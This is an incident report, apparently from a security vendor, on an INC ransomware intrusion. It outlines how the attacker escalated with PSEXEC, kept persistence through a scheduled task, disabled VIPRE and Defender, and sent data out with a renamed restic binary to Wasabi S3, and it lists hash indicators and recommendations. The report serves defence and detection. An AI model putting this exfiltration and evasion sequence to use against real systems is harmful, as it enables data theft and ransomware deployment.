Full Report
Threat actors are people, too, and like everyone else, make mistakes. These mistakes can reveal insights into the threat actor, or even expose access to their infrastructure. In this incident, a thorough investigation revealed that the threat actor had accessed the reported endpoint on 24 February, during which they mapped a share to the endpoint (as the F:\ volume), launched the MS-provided utility PSEXEC to elevate their privileges, and then created the Recovery Diagnostics scheduled task to run C:\Users\Public\Documents\new.ps1. The command line for that scheduled task appears as follows:
Analysis Summary
# Incident Report: INC Ransomware Deployment and Data Exfiltration
## Executive Summary
A threat actor compromised an organization's endpoint to stage and exfiltrate data using the Restic backup utility before deploying INC Ransomware. The attacker successfully disabled security software, including VIPRE and Windows Defender, to facilitate the final encryption phase. The incident was characterized by the use of Living-off-the-Land Binaries (LoLBins) and a lack of full EDR coverage on the affected network.
## Incident Details
- **Discovery Date:** 25 February 2026
- **Incident Date:** 24 February 2026 – 25 February 2026
- **Affected Organization:** Not disclosed
- **Sector:** Not disclosed
- **Geography:** Not disclosed
## Timeline of Events
### Initial Access
- **Date/Time:** 24 February 2026
- **Vector:** Not explicitly stated (attributed to prior access/knowledge of infrastructure).
- **Details:** The threat actor accessed the endpoint and mapped a network share as the `F:\` volume.
### Lateral Movement
- **Details:** The actor utilized `PSEXEC` (a Microsoft Sysinternals utility) to elevate privileges and execute commands across the system.
### Data Exfiltration/Impact
- **Date/Time:** 24 February 2026
- **Details:** Decoded PowerShell commands revealed the use of `restic` (renamed as `winupdate.exe`) to back up data to a Wasabi S3 bucket (`s3:s3.wasabisys[.]com`). A file list `new.txt` was used to target specific data for exfiltration.
### Detection & Response
- **Discovery:** Detected by Huntress SOC analysts on 25 February 2026 during the ransomware deployment phase.
- **Response Actions:** Analysts triaged the incident; however, the endpoint was taken offline, and limited EDR deployment hindered earlier visibility.
## Attack Methodology
- **Initial Access:** Likely via compromised credentials or existing persistence.
- **Persistence:** Created a scheduled task named "Recovery Diagnostics" to run a malicious PowerShell script (`new.ps1`).
- **Privilege Escalation:** Used `PSEXEC` and scheduled tasks running as `SYSTEM`.
- **Defense Evasion:**
- Renamed `restic.exe` to `winupdate.exe`.
- Uninstalled VIPRE Business Agent using a specific uninstaller utility.
- Disabled Windows Defender Real-Time Protection.
- Encoded PowerShell commands in Base64 to blend with RMM traffic.
- **Discovery:** Used a text file (`new.txt`) containing targeted file paths for exfiltration.
- **Lateral Movement:** Mapping network drives (`F:\` volume).
- **Exfiltration:** Used the `restic` backup utility to send data to Wasabi cloud storage.
- **Impact:** Deployment of INC Ransomware via `c:\perflogs\win.exe`.
## Impact Assessment
- **Financial:** Significant costs associated with ransomware remediation and potential ransom demands.
- **Data Breach:** Sensitive files were exfiltrated to a threat-actor-controlled S3 bucket.
- **Operational:** Endpoint encryption led to business disruption; security agents were compromised.
- **Reputational:** Potential exposure of client data stored in the exfiltrated environment.
## Indicators of Compromise
- **File Indicators (SHA256):**
- `1d15b57db62c079fc6274f8ea02ce7ec3d6b158834b142f5345db14f16134f0d` (edr.exe)
- `e034a4c00f168134900bfe235ff2f78daf8bfcfa8b594cd2dd563d43f5de1b13` (win.exe - INC Ransomware)
- **Behavioral Indicators:**
- Deployment of `restic` or renamed versions (e.g., `winupdate.exe`).
- Scheduled task creation: "Recovery Diagnostics".
- Execution of `VIPRE Business AgentAgentUninstallPassword.exe`.
- PowerShell environment variables containing `AWS_ACCESS_KEY_ID` and `RESTIC_REPOSITORY`.
## Response Actions
- **Containment:** Endpoint was taken offline to prevent further encryption/propagation.
- **Eradication:** Threat actor infrastructure identified (Wasabi S3 bucket).
- **Recovery:** Investigation of Windows Event Logs (IDs 600, 15, 5001) to reconstruct the timeline.
## Lessons Learned
- **Visibility Gaps:** The partial deployment of the Huntress agent and the absence of a SIEM allowed the attacker to operate undetected during the staging phase.
- **Insecure Tools:** Threat actors frequently leverage legitimate backup utilities (`restic`) and admin tools (`PSEXEC`) to bypass traditional signature-based detection.
- **Attacker Mistakes:** The threat actor failed to redact the `RESTIC_PASSWORD` in the PowerShell logs, providing insight into their infrastructure.
## Recommendations
- **Complete EDR Coverage:** Ensure security agents are deployed on 100% of endpoints.
- **Logging:** Implement centralized logging (SIEM) to monitor for Base64 PowerShell commands and Windows Event Log deletions/service stops.
- **Access Control:** Restrict the use of `PSEXEC` and similar administrative tools to authorized personnel via Allow-listing.
- **Cloud Monitoring:** Monitor for unexpected outbound traffic to known cloud storage providers like Wasabi or AWS S3.